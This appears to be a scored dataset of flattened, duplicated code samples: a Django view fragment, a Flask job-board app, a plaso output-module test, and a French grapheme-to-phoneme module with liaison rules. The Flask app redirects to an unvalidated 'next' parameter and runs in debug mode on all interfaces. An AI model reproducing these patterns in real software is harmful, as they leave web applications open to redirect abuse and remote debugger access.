(resp.status_code >= 200) and (resp.status_code<=300) : resp = requests.get(url, headers=headers) return render(request, "users/info.html", 
resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else: url = url_root + '/users/profile' headers = { 'user-agent': request.META['HTTP_USER_AGENT'], 'Cookie': request.COOKIES['session_id'], } resp = requests.get(url, headers=headers) if (resp.status_code >= 200) and (resp.status_code<=300) : return render(request, "users/update.html", resp.json()) else: object_err = resp.json() object_err['status'] = resp.status_code return render(request, "errors.html", object_err) else : return redirect('/users/login/')
0.502197
0.075176
import os from datetime import datetime from urlparse import urlparse from flask import Flask, render_template, request, redirect, url_for, flash, session from flaskext.seasurf import SeaSurf from flaskext.bcrypt import Bcrypt from flaskext.gravatar import Gravatar from functools import wraps import settings from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField app = Flask(__name__) app.config.from_object(settings) csrf = SeaSurf(app) bcrypt = Bcrypt(app) gravatar = Gravatar(app, size=160, default='mm') database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board')) connect(database.path[1:], host=database.hostname, port=database.port, username=database.username, password=<PASSWORD>) class User(Document): username = StringField(required=True) email = EmailField(required=True) first_name = StringField(max_length=50) last_name = StringField(max_length=50) location = StringField() homepage = StringField() passhash = StringField() created = DateTimeField() meta = { 'ordering': ['-created'] } class Job(Document): company_name = StringField(required=True) company_location = StringField(required=True) company_url = URLField(required=True) job_title = StringField(required=True) job_posting = StringField(required=True) application_instructions = StringField(required=True) created = DateTimeField() meta = { 'ordering': ['-created'] } def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("logged_in"): return f(*args, **kwargs) else: flash(u'Login is required.', 'warning') return redirect(url_for('login', next=request.url)) return decorated_function @app.template_filter() def timesince(dt, default="just now"): """ Returns string representing "time since" e.g. 3 days ago, 5 hours ago etc. 
""" now = datetime.utcnow() diff = now - dt periods = ( (diff.days / 365, "year", "years"), (diff.days / 30, "month", "months"), (diff.days / 7, "week", "weeks"), (diff.days, "day", "days"), (diff.seconds / 3600, "hour", "hours"), (diff.seconds / 60, "minute", "minutes"), (diff.seconds, "second", "seconds"), ) for period, singular, plural in periods: if period: return "%d %s ago" % (period, singular if period == 1 else plural) return default @app.route("/") def home(): jobs = Job.objects.all() return render_template('home.html', jobs=jobs) @app.route('/about') def about(): return render_template('about.html') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/create', methods=['GET', 'POST']) @login_required def create_job(): if request.method == 'POST': job = Job(company_name=request.form['company_name']) job.company_location=request.form['company_location'] company_url=request.form['company_url'] if company_url[:4] == 'http': job.company_url=company_url else: job.company_url='http://'+company_url job.job_title=request.form['job_title'] job.job_posting=request.form['job_posting'] job.application_instructions=request.form['application_instructions'] job.created=datetime.utcnow() job.save() next_url = job.id flash(u'Job successfully created.', 'success') return redirect(url_for('show_job', job_id=next_url)) else: return render_template('create_job.html') @app.route('/signup', methods=['GET', 'POST']) def signin(): if request.method == 'POST': if request.form['password'] == request.form['password2']: user = User(username=request.form['username']) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location='None' user.passhash=<PASSWORD>.generate_password_hash(request.form['password']) user.homepage='None' user.created=datetime.utcnow() user.save() user_id=user.id session['username'] = user.username session['logged_in'] = True flash(u'Successfully created new 
user.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: flash(u'Passwords do not match.', 'error') return render_template('create_user.html') else: return render_template('create_user.html') @app.route('/login', methods=['GET', 'POST']) def login(): next = request.values.get('next', '') if request.method == 'POST': try: user = User.objects.get(username=request.form['username']) except User.DoesNotExist: flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: if not bcrypt.check_password_hash(user.passhash, request.form['password']): flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: session['username'] = user.username session['logged_in'] = True flash(u'You have been successfully logged in.', 'success') return redirect(next or url_for('home')) return render_template('login.html') @app.route('/logout') def logout(): session.pop('username', None) session.pop('logged_in', None) flash(u'You have been successfully logged out.', 'info') return redirect(url_for('home')) @app.route('/settings', methods=['GET', 'POST']) @login_required def settings(): if request.method == 'POST': user=User.objects.get(username=session.get('username')) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location=request.form['location'] user.homepage=request.form['homepage'] user.save() user_id=user.id flash(u'Profile was successfully updated.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: user=User.objects.get(username=session.get('username')) return render_template('settings.html', user=user) @app.route('/user/<user_id>') def show_user(user_id): user = User.objects.with_id(user_id) return render_template('show_user.html', user=user) @app.route('/job/<job_id>') def show_job(job_id): job = Job.objects.with_id(job_id) return render_template('show_job.html', job=job) @app.route('/users') 
def show_all_users(): users = User.objects.all() return render_template('show_all_users.html', users=users) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 if __name__ == "__main__": port = int(os.environ.get("PORT", 5000)) app.debug = True app.run(host='0.0.0.0', port=port)
flask-job-board/app.py
import os from datetime import datetime from urlparse import urlparse from flask import Flask, render_template, request, redirect, url_for, flash, session from flaskext.seasurf import SeaSurf from flaskext.bcrypt import Bcrypt from flaskext.gravatar import Gravatar from functools import wraps import settings from mongoengine import connect, Document, StringField, EmailField, DateTimeField, URLField app = Flask(__name__) app.config.from_object(settings) csrf = SeaSurf(app) bcrypt = Bcrypt(app) gravatar = Gravatar(app, size=160, default='mm') database = urlparse(os.environ.get('MONGOHQ_URL', 'mongodb://localhost/flask-job-board')) connect(database.path[1:], host=database.hostname, port=database.port, username=database.username, password=<PASSWORD>) class User(Document): username = StringField(required=True) email = EmailField(required=True) first_name = StringField(max_length=50) last_name = StringField(max_length=50) location = StringField() homepage = StringField() passhash = StringField() created = DateTimeField() meta = { 'ordering': ['-created'] } class Job(Document): company_name = StringField(required=True) company_location = StringField(required=True) company_url = URLField(required=True) job_title = StringField(required=True) job_posting = StringField(required=True) application_instructions = StringField(required=True) created = DateTimeField() meta = { 'ordering': ['-created'] } def login_required(f): @wraps(f) def decorated_function(*args, **kwargs): if session.get("logged_in"): return f(*args, **kwargs) else: flash(u'Login is required.', 'warning') return redirect(url_for('login', next=request.url)) return decorated_function @app.template_filter() def timesince(dt, default="just now"): """ Returns string representing "time since" e.g. 3 days ago, 5 hours ago etc. 
""" now = datetime.utcnow() diff = now - dt periods = ( (diff.days / 365, "year", "years"), (diff.days / 30, "month", "months"), (diff.days / 7, "week", "weeks"), (diff.days, "day", "days"), (diff.seconds / 3600, "hour", "hours"), (diff.seconds / 60, "minute", "minutes"), (diff.seconds, "second", "seconds"), ) for period, singular, plural in periods: if period: return "%d %s ago" % (period, singular if period == 1 else plural) return default @app.route("/") def home(): jobs = Job.objects.all() return render_template('home.html', jobs=jobs) @app.route('/about') def about(): return render_template('about.html') @app.route('/contact') def contact(): return render_template('contact.html') @app.route('/create', methods=['GET', 'POST']) @login_required def create_job(): if request.method == 'POST': job = Job(company_name=request.form['company_name']) job.company_location=request.form['company_location'] company_url=request.form['company_url'] if company_url[:4] == 'http': job.company_url=company_url else: job.company_url='http://'+company_url job.job_title=request.form['job_title'] job.job_posting=request.form['job_posting'] job.application_instructions=request.form['application_instructions'] job.created=datetime.utcnow() job.save() next_url = job.id flash(u'Job successfully created.', 'success') return redirect(url_for('show_job', job_id=next_url)) else: return render_template('create_job.html') @app.route('/signup', methods=['GET', 'POST']) def signin(): if request.method == 'POST': if request.form['password'] == request.form['password2']: user = User(username=request.form['username']) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location='None' user.passhash=<PASSWORD>.generate_password_hash(request.form['password']) user.homepage='None' user.created=datetime.utcnow() user.save() user_id=user.id session['username'] = user.username session['logged_in'] = True flash(u'Successfully created new 
user.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: flash(u'Passwords do not match.', 'error') return render_template('create_user.html') else: return render_template('create_user.html') @app.route('/login', methods=['GET', 'POST']) def login(): next = request.values.get('next', '') if request.method == 'POST': try: user = User.objects.get(username=request.form['username']) except User.DoesNotExist: flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: if not bcrypt.check_password_hash(user.passhash, request.form['password']): flash(u'Password or Username is incorrect.', 'error') return render_template('login.html') else: session['username'] = user.username session['logged_in'] = True flash(u'You have been successfully logged in.', 'success') return redirect(next or url_for('home')) return render_template('login.html') @app.route('/logout') def logout(): session.pop('username', None) session.pop('logged_in', None) flash(u'You have been successfully logged out.', 'info') return redirect(url_for('home')) @app.route('/settings', methods=['GET', 'POST']) @login_required def settings(): if request.method == 'POST': user=User.objects.get(username=session.get('username')) user.email=request.form['email'] user.first_name=request.form['first_name'] user.last_name=request.form['last_name'] user.location=request.form['location'] user.homepage=request.form['homepage'] user.save() user_id=user.id flash(u'Profile was successfully updated.', 'success') return redirect(url_for('show_user', user_id=user_id)) else: user=User.objects.get(username=session.get('username')) return render_template('settings.html', user=user) @app.route('/user/<user_id>') def show_user(user_id): user = User.objects.with_id(user_id) return render_template('show_user.html', user=user) @app.route('/job/<job_id>') def show_job(job_id): job = Job.objects.with_id(job_id) return render_template('show_job.html', job=job) @app.route('/users') 
def show_all_users(): users = User.objects.all() return render_template('show_all_users.html', users=users) @app.errorhandler(404) def page_not_found(e): return render_template('404.html'), 404 if __name__ == "__main__": port = int(os.environ.get("PORT", 5000)) app.debug = True app.run(host='0.0.0.0', port=port)
0.361954
0.065009
"""Tests for plaso.output.l2t_csv.""" import StringIO import unittest from plaso.formatters import interface as formatters_interface from plaso.lib import event from plaso.lib import eventdata from plaso.output import dynamic class TestEvent(event.EventObject): DATA_TYPE = 'test:dynamic' def __init__(self): super(TestEvent, self).__init__() self.timestamp = 1340821021000000 self.timestamp_desc = eventdata.EventTimestamp.CHANGE_TIME self.hostname = 'ubuntu' self.filename = 'log/syslog.1' self.text = ( u'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n ' u'closed for user root)') class TestEventFormatter(formatters_interface.EventFormatter): DATA_TYPE = 'test:dynamic' FORMAT_STRING = u'{text}' SOURCE_SHORT = 'LOG' SOURCE_LONG = 'Syslog' class FakeFilter(object): """Provide a fake filter, that defines which fields to use.""" def __init__(self, fields, separator=u','): self.fields = fields self.separator = separator class DynamicTest(unittest.TestCase): """Test the dynamic output module.""" def testHeader(self): output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output) correct_line = ( 'datetime,timestamp_desc,source,source_long,message,parser,' 'display_name,tag,store_number,store_index\n') formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'])) correct_line = 'date,time,message,hostname,filename,some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'], '@')) correct_line = 'date@time@message@hostname@filename@some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) def testEventBody(self): """Test ensures that returned lines returned are fmt CSV as expected.""" 
event_object = TestEvent() output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'timezone', 'macb', 'source', 'sourcetype', 'type', 'user', 'host', 'message_short', 'message', 'filename', 'inode', 'notes', 'format', 'extra'])) formatter.Start() header = ( 'date,time,timezone,macb,source,sourcetype,type,user,host,' 'message_short,message,filename,inode,notes,format,extra\n') self.assertEquals(output.getvalue(), header) formatter.EventBody(event_object) correct = ( '2012-06-27,18:17:01,UTC,..C.,LOG,Syslog,Metadata Modification Time,-,' 'ubuntu,Reporter <CRON> PID: 8442 (pam_unix(cron:session): session ' 'closed for user root),Reporter <CRON> PID: 8442 ' '(pam_unix(cron:session): session closed for user root),log/syslog.1' ',-,-,-,-\n') self.assertEquals(output.getvalue(), header + correct) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['datetime', 'nonsense', 'hostname', 'message'])) header = 'datetime,nonsense,hostname,message\n' formatter.Start() self.assertEquals(output.getvalue(), header) correct = ( '2012-06-27T18:17:01+00:00,-,ubuntu,Reporter <CRON> PID: 8442' ' (pam_unix(cron:session): session closed for user root)\n') formatter.EventBody(event_object) self.assertEquals(output.getvalue(), header + correct) if __name__ == '__main__': unittest.main()
plaso/output/dynamic_test.py
"""Tests for plaso.output.l2t_csv.""" import StringIO import unittest from plaso.formatters import interface as formatters_interface from plaso.lib import event from plaso.lib import eventdata from plaso.output import dynamic class TestEvent(event.EventObject): DATA_TYPE = 'test:dynamic' def __init__(self): super(TestEvent, self).__init__() self.timestamp = 1340821021000000 self.timestamp_desc = eventdata.EventTimestamp.CHANGE_TIME self.hostname = 'ubuntu' self.filename = 'log/syslog.1' self.text = ( u'Reporter <CRON> PID: 8442 (pam_unix(cron:session): session\n ' u'closed for user root)') class TestEventFormatter(formatters_interface.EventFormatter): DATA_TYPE = 'test:dynamic' FORMAT_STRING = u'{text}' SOURCE_SHORT = 'LOG' SOURCE_LONG = 'Syslog' class FakeFilter(object): """Provide a fake filter, that defines which fields to use.""" def __init__(self, fields, separator=u','): self.fields = fields self.separator = separator class DynamicTest(unittest.TestCase): """Test the dynamic output module.""" def testHeader(self): output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output) correct_line = ( 'datetime,timestamp_desc,source,source_long,message,parser,' 'display_name,tag,store_number,store_index\n') formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'])) correct_line = 'date,time,message,hostname,filename,some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'message', 'hostname', 'filename', 'some_stuff'], '@')) correct_line = 'date@time@message@hostname@filename@some_stuff\n' formatter.Start() self.assertEquals(output.getvalue(), correct_line) def testEventBody(self): """Test ensures that returned lines returned are fmt CSV as expected.""" 
event_object = TestEvent() output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['date', 'time', 'timezone', 'macb', 'source', 'sourcetype', 'type', 'user', 'host', 'message_short', 'message', 'filename', 'inode', 'notes', 'format', 'extra'])) formatter.Start() header = ( 'date,time,timezone,macb,source,sourcetype,type,user,host,' 'message_short,message,filename,inode,notes,format,extra\n') self.assertEquals(output.getvalue(), header) formatter.EventBody(event_object) correct = ( '2012-06-27,18:17:01,UTC,..C.,LOG,Syslog,Metadata Modification Time,-,' 'ubuntu,Reporter <CRON> PID: 8442 (pam_unix(cron:session): session ' 'closed for user root),Reporter <CRON> PID: 8442 ' '(pam_unix(cron:session): session closed for user root),log/syslog.1' ',-,-,-,-\n') self.assertEquals(output.getvalue(), header + correct) output = StringIO.StringIO() formatter = dynamic.Dynamic(None, output, filter_use=FakeFilter( ['datetime', 'nonsense', 'hostname', 'message'])) header = 'datetime,nonsense,hostname,message\n' formatter.Start() self.assertEquals(output.getvalue(), header) correct = ( '2012-06-27T18:17:01+00:00,-,ubuntu,Reporter <CRON> PID: 8442' ' (pam_unix(cron:session): session closed for user root)\n') formatter.EventBody(event_object) self.assertEquals(output.getvalue(), header + correct) if __name__ == '__main__': unittest.main()
0.630344
0.252316
# =============================================================================
# French grapheme-to-phoneme "reader" (lecture.py).
# - Samples (word, pronunciation) pairs from a frequency-weighted lexicon.
# - Defines an attention-based BiLSTM/GRU Keras model mapping letters to
#   phonemes, one softmax per output phoneme position.
# - Applies French pronunciation rules (liaison, mute final "e") between
#   consecutive words when reading words, verses, stanzas and poems.
# Phonemes use a one-character-per-phoneme alphabet (Lexique-style notation).
# =============================================================================
from trad_chiffre_mot import tradn
import os

import numpy as np
import pandas as pd
from scipy.sparse import csr_matrix
from nltk.tag import StanfordPOSTagger
from nltk.tokenize import RegexpTokenizer
from keras import Input
from keras.layers import Bidirectional, LSTM, Dropout, RepeatVector, Concatenate, Dense, Activation, Dot, GRU
from keras.models import Model
from keras.optimizers import Adam
from sklearn.model_selection import train_test_split


def filter_length(df, n=8, phon="2_phon", sup_n=True):
    """Filter lexicon rows by pronunciation length.

    :param df: lexicon DataFrame
    :param n: length threshold (number of phoneme characters)
    :param phon: column holding the phoneme strings
    :param sup_n: keep rows with len >= n when True, len < n when False
    :return: filtered DataFrame (a view via .loc)
    """
    phonemes = df.loc[:, phon]
    if sup_n:
        filtre = phonemes.apply(lambda x: len(x) >= n)
    else:
        filtre = phonemes.apply(lambda x: len(x) < n)
    return df.loc[filtre, :]


def sample(df, m=1000, mots="1_ortho", phon="2_phon", occurances="10_freqlivres", ln_dist=False, seed=23):
    """Draw m (word, pronunciation) couples, weighted by word frequency.

    :param df: lexicon DataFrame
    :param mots: column holding the spellings
    :param phon: column holding the phoneme strings
    :param occurances: column holding the word frequencies
    :param ln_dist: apply log(1 + freq) before normalising when True
    :param m: number of couples to draw (with replacement)
    :param seed: RNG seed for the sampling
    :return: list of m (word, pronunciation) tuples
    """
    list_w2p = []
    list_occ = []
    for row in df[[mots, phon, occurances]].to_numpy():
        w, p, o = tuple(row)
        list_w2p.append([w, p])
        list_occ.append(o)
    list_occ = np.array(list_occ)
    # Normalise frequencies into a probability distribution.
    if ln_dist:
        list_occ = np.log(list_occ + 1)
    list_occ = list_occ / np.sum(list_occ)
    # Back to plain Python containers for np.random.choice bookkeeping.
    list_tuples = [tuple(couple) for couple in list_w2p]
    list_occ = list_occ.tolist()
    n_occ = len(list_tuples)
    np.random.seed(seed)
    distr = np.random.choice(a=range(n_occ), size=m, p=list_occ).tolist()
    return [list_tuples[i] for i in distr]


def train_dev(df, test_size=0.01, m=1000, forced_train=None, mots="1_ortho", phon="2_phon",
              occurances="10_freqlivres", ln_dist=False, seed=23):
    """Split the lexicon and sample frequency-weighted train/dev couples.

    :param df: lexicon DataFrame
    :param test_size: fraction of rows (and of m) used for the dev set
    :param m: number of training couples to draw
    :param forced_train: words that must end up in the training data
    :param mots: column holding the spellings
    :param phon: column holding the phoneme strings
    :param occurances: column holding the word frequencies
    :param ln_dist: apply log scaling to frequencies when True
    :param seed: seed for both the split and the sampling
    :return: (train couples, dev couples), each a list of tuples
    """
    if forced_train is None:
        forced_train = []
    train_df, test_df = train_test_split(df, test_size=test_size, random_state=seed)
    if len(forced_train) > 0:
        # Move the forced words from the dev rows into the training rows.
        forced_idx = test_df[mots].apply(lambda x: x in forced_train)
        forced = test_df.loc[forced_idx, :]
        # BUG FIX: DataFrame.append was deprecated and removed (pandas >= 2.0);
        # pd.concat is the supported equivalent.
        train_df = pd.concat([train_df, forced], ignore_index=True)
        # BUG FIX: the original used `-forced_idx`; unary minus on a boolean
        # Series is not a valid negation in modern pandas — `~` is.
        test_df = test_df.loc[~forced_idx, :]
    train_s = sample(train_df, m=m, mots=mots, phon=phon, occurances=occurances, ln_dist=ln_dist, seed=seed)
    test_s = sample(test_df, m=int(m * test_size), mots=mots, phon=phon, occurances=occurances,
                    ln_dist=ln_dist, seed=seed)
    return train_s, test_s


def model_test(tx, ty, n_l, n_p, n_brnn1=32, n_h1=64):
    """Build a small attention seq2seq model (experimental variant).

    :param tx: input length (letters), ty: output length (phonemes)
    :param n_l: letter-alphabet size, n_p: phoneme-alphabet size
    :param n_brnn1: BiLSTM units per direction, n_h1: decoder GRU units
    :return: uncompiled keras Model with inputs [x, c0, h0]
    """
    x = Input(shape=(tx, n_l))
    c0 = Input(shape=(n_h1,), name='c0')
    h0 = Input(shape=(n_h1,), name='h0')
    c = c0
    h = h0
    outputs = list()
    # Encoder over the letter sequence.
    a = Bidirectional(LSTM(units=n_brnn1, return_sequences=True, name="LSTM_mot"))(x)
    a = Dropout(0.2, name="dropout_LSTM_orthographe")(a)
    for t in range(ty):
        # Additive attention: score each encoder step against the decoder state.
        h_rep = RepeatVector(tx, name="att_repeat_phoneme{}".format(t))(h)
        ah = Concatenate(axis=-1, name="att_concat_phoneme{}".format(t))([h_rep, a])
        energies = Dense(units=n_h1, activation="tanh", name="att_caractere_phoneme{}".format(t))(ah)
        energies = Dense(units=1, activation="relu", name="att_moyenne_phoneme{}".format(t))(energies)
        alpha = Activation("softmax", name="att_alpha_phoneme{}".format(t))(energies)
        context = Dot(axes=1, name="att_application_phoneme{}".format(t))([alpha, a])
        # NOTE(review): this test variant uses recurrent_activation='tanh'
        # where Lecteur.model uses 'sigmoid' — presumably deliberate for
        # experimentation; confirm before unifying.
        h, c = GRU(units=n_h1, activation='tanh', recurrent_activation='tanh', return_state=True,
                   name="LSTM_phoneme{}".format(t))(inputs=context, initial_state=c)
        h = Dropout(rate=0.1, name="dropout_phoneme{}".format(t))(h)
        c = Dropout(rate=0.1, name="dropout_memory_phoneme{}".format(t))(c)
        outy = Dense(activation="softmax", units=n_p, name="LSTM_{}".format(t))(h)
        outputs.append(outy)
    net = Model(inputs=[x, c0, h0], outputs=outputs)
    return net


def pos_tag(mots,
            jar=os.path.join(".", "models", "stanford-postagger", "stanford-postagger-3.8.0.jar"),
            mdl=os.path.join(".", "models", "stanford-postagger", "french-ud.tagger")):
    """POS-tag a list of French tokens with the Stanford tagger.

    Post-processes the UD tags: "au"/"aux" are forced to DET, and the PART /
    SCONJ tags (absent from the pronunciation tables) are remapped to
    ADV / CONJ respectively.

    :param mots: list of tokens
    :param jar: path to the Stanford POS tagger jar
    :param mdl: path to the French UD tagger model
    :return: list of (token, tag) tuples
    """
    try:
        pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8')
    except LookupError:
        # Java not found on PATH: fall back to a hard-coded Windows JRE.
        java_path = r"C:\Program Files (x86)\Java\jre1.8.0_261\bin\java.exe"
        os.environ['JAVAHOME'] = java_path
        pos_tagger = StanfordPOSTagger(mdl, jar, encoding='utf8')
    tagged = pos_tagger.tag(mots)
    tags = [g for m, g in tagged]
    forced_det = ["au", "aux"]
    absent_of_table = ["PART", "SCONJ"]
    # Only walk the list again when a correction is actually needed.
    if any(item in mots for item in forced_det) or any(item in tags for item in absent_of_table):
        for i, couple in enumerate(tagged):
            mot = couple[0]
            gram = couple[1]
            if mot in forced_det:
                tagged[i] = (mot, "DET")
            if gram == "PART":
                tagged[i] = (mot, "ADV")
            if gram == "SCONJ":
                tagged[i] = (mot, "CONJ")
    return tagged


def check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs):
    """Decide whether a French liaison can occur between two adjacent words.

    :param ortho1: spelling of the first word
    :param ortho2: spelling of the second word
    :param phon1: phonemes of the first word
    :param phon2: phonemes of the second word
    :param nat1: POS tag of the first word
    :param nat2: POS tag of the second word
    :param phrase: surrounding sentence (used to rule out punctuation breaks)
    :return: True when a liaison is allowed
    """
    voyelles_p = kwargs.get("voyelles_p", ['a', 'E', '§', 'o', 'O', '1', 'i', '5', 'e', 'u', '@', '°', '9',
                                           'y', '2'])
    y_p = kwargs.get("y_p", ['w', 'j', '8'])  # semi-vowels
    # Final letter -> phonemes it already produces when pronounced.
    consonnes_liaisons = {'d': ['d'], 'p': ["p"], 'r': ["R"], 's': ['s', 'z'], 't': ['t'], 'x': ['s', 'z'],
                          'n': ['n', 'G'], 'z': ['z', 's']}
    liables = False
    # Second word must start with a (semi-)vowel sound and not with 'h'.
    mot2_voyelle = ((phon2[0] in y_p) or (phon2[0] in voyelles_p)) and (ortho2[0] != 'h')
    if mot2_voyelle:
        # First word must end with a liaison letter that is currently silent.
        mot1_consonne_liaison = (ortho1[-1] in consonnes_liaisons.keys()) and\
            (phon1[-1] not in consonnes_liaisons[ortho1[-1]])
        if mot1_consonne_liaison:
            mot1_dern_son_voyelle = (ortho1[-1] in consonnes_liaisons.keys()) and (phon1[-1] in voyelles_p)
            # The two words must be adjacent in the sentence (no punctuation).
            pas_ponctuation = (" ".join([ortho1, ortho2]) in phrase) or ("-".join([ortho1, ortho2]) in phrase)
            if pas_ponctuation:
                # Grammatical contexts in which liaison applies.
                if (nat1 in ["NUM", "DET", "ADJ"]) and (nat2 in ["NOUN", "PROPN"]):
                    liables = True
                elif ortho1 in ["on", "nous", "vous", "ils", "elles", "en", "tout"] and nat2 in ["AUX", "VERB"]:
                    liables = True
                elif nat1 in ["AUX", "VERB"] and mot1_dern_son_voyelle:
                    liables = True
                elif nat1 in ["ADP"]:
                    liables = True
                elif (nat1 in ["NOUN"]) and (ortho1[-1] in ['s']) and (nat2 in ["ADJ"]):
                    liables = True
                elif (nat1 == "ADV") and (nat2 in ["ADV", "ADJ", "NOUN"]):
                    liables = True
                elif (ortho1 == "quand") and (nat2 not in ["AUX", "VERB"]):
                    liables = True
                elif (ortho1 == "plus") and (ortho2 == "ou"):
                    liables = True
                elif (ortho1 == "tout") and (ortho2 in ["à", "autour"]):
                    liables = True
    return liables


def liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs):
    """Return phon1 with the liaison phoneme appended when one applies.

    Same parameters as check_liaison; only phon1 is (possibly) modified.
    """
    # Final letter -> liaison phoneme in the simple (non-nasal) case.
    dico_liaisons_simples = kwargs.get("dico_liaisons", {'d': 't', 'p': 'p', 's': 'z', 't': 't', 'x': 'z',
                                                         'z': 'z'})
    # Words whose nasal liaison just appends /n/ without denasalising.
    mots_nasale_simples = kwargs.get("mots_nasale_simples", ["aucun", "bien", "en", "on", "rien", "un",
                                                             "non", "mon", "ton", "son"])
    liaison_a_faire = check_liaison(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs)
    if liaison_a_faire:
        derniere_lettre = ortho1[-1]
        if derniere_lettre in dico_liaisons_simples.keys():
            phon1 = "{}{}".format(phon1, dico_liaisons_simples[derniere_lettre])
        if derniere_lettre == 'r' and phon1[-1] == "e":
            # e.g. "premier": /e/ opens to /ER/ in liaison.
            phon1 = "{}{}".format(phon1[:-1], "ER")
        if derniere_lettre == 'n':
            # Nasal endings, e.g. "bon", "certain", "commun".
            dernier_phoneme = phon1[-1]
            if (ortho1 in mots_nasale_simples) or (dernier_phoneme == "1"):
                phon1 = "{}{}".format(phon1, 'n')
            else:
                # Denasalise according to the spelling of the ending.
                if dernier_phoneme == "§":
                    phon1 = "{}{}".format(phon1[:-1], "On")
                if dernier_phoneme == "@" and ortho1[-2:] == "an":
                    phon1 = "{}{}".format(phon1[:-1], "an")
                if dernier_phoneme == "5":
                    if ortho1[-2:] == "en":
                        phon1 = "{}{}".format(phon1[:-1], "En")
                    if ortho1[-2:] == "in":
                        phon1 = "{}{}".format(phon1[:-1], "in")
                    if ortho1[-3:] in ["ein", "ain"]:
                        phon1 = "{}{}".format(phon1[:-2], "En")
    return phon1


def e_final(ortho1, ortho2, phon1, phon2, nat1, nat2, phrase, **kwargs):
    """Possibly pronounce a final mute "e" (schwa) before the next word.

    Same parameters as check_liaison; returns the (possibly) updated phon1.
    """
    e_potentiel = (ortho1[-1] == 'e') or (ortho1[-2:] == 'es') or (ortho1[-3:] == 'ent')
    son_final = phon1[-1]
    son_initial = phon2[0]
    lettre_initiale = ortho2[0]
    # Consonant phonemes (the duplicated 'v'/'g' entries are harmless for
    # membership tests; kept as in the original table).
    consonnes_p = ['k', 'p', 'l', 't', 'R', 'j', 'f', 's', 'd', 'Z', 'n', 'b', 'v', 'g', 'v', 'g', 'm',
                   'z', 'w', 'S', 'N', '8', 'G', 'x']
    lien_mots = (son_final in consonnes_p) and ((son_initial in consonnes_p) or lettre_initiale == 'h')
    if e_potentiel and lien_mots:
        # Consonant cluster across the word boundary: sound the schwa.
        phon1 = "{}°".format(phon1)
    elif e_potentiel and (son_final in consonnes_p):
        # Second word starts with a vowel: try schwa + liaison together and
        # keep it only if the liaison actually fired.
        phon1_e = "{}°".format(phon1)
        phon1_e_liaison = liaison(ortho1, ortho2, phon1_e, phon2, nat1, nat2, phrase, **kwargs)
        if phon1_e != phon1_e_liaison:
            phon1 = phon1_e_liaison
    return phon1


def liaisons_tokens(mots, prononciation, pos_mots, phrase):
    """Apply `liaison` to each consecutive token pair; returns updated phonemes."""
    n = len(prononciation)
    for i in range(n - 1):
        prononciation[i] = liaison(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1],
                                   pos_mots[i][1], pos_mots[i + 1][1], phrase.lower())
    return prononciation


def e_final_tokens(mots, prononciation, pos_mots, phrase):
    """Apply `e_final` to each consecutive token pair; returns updated phonemes."""
    n = len(prononciation)
    for i in range(n - 1):
        prononciation[i] = e_final(mots[i], mots[i + 1], prononciation[i], prononciation[i + 1],
                                   pos_mots[i][1], pos_mots[i + 1][1], phrase)
    return prononciation


class Lecteur:
    """"Classe definissant le lecteur """
    # The "reader": holds the letter/phoneme alphabets, the pronunciation
    # dictionaries and the neural fallback model, and exposes word / verse /
    # stanza / poem reading.

    def __init__(self, tx, ty, l2idx, p2idx, dico_unique, dico_multiple, n_brnn1=90, n_h1=80, net=None,
                 blank="_"):
        # tx / ty: maximum word length (letters) / pronunciation length.
        # l2idx / p2idx: letter -> index and phoneme -> index mappings.
        # dico_unique: word -> pronunciation (unambiguous words).
        # dico_multiple: (word, POS tag) -> pronunciation (ambiguous words).
        # blank: padding character marking end-of-sequence.
        self.tx = tx
        self.ty = ty
        self.l2idx = l2idx
        self.p2idx = p2idx
        self._dico_unique = dico_unique
        self._ortho_unique = dico_unique.keys()
        self._dico_multiple = dico_multiple
        self._ortho_multiple = list(set([w for w, _ in dico_multiple.keys()]))
        self.n_brnn1 = n_brnn1
        self.n_h1 = n_h1
        self.net = net
        self.blank = blank
        self.count_lecture = 0  # number of reads performed (progress logging)

    # --- properties keeping the ortho_* views in sync with the dicts --------
    def _get_dico_unique(self):
        return self._dico_unique

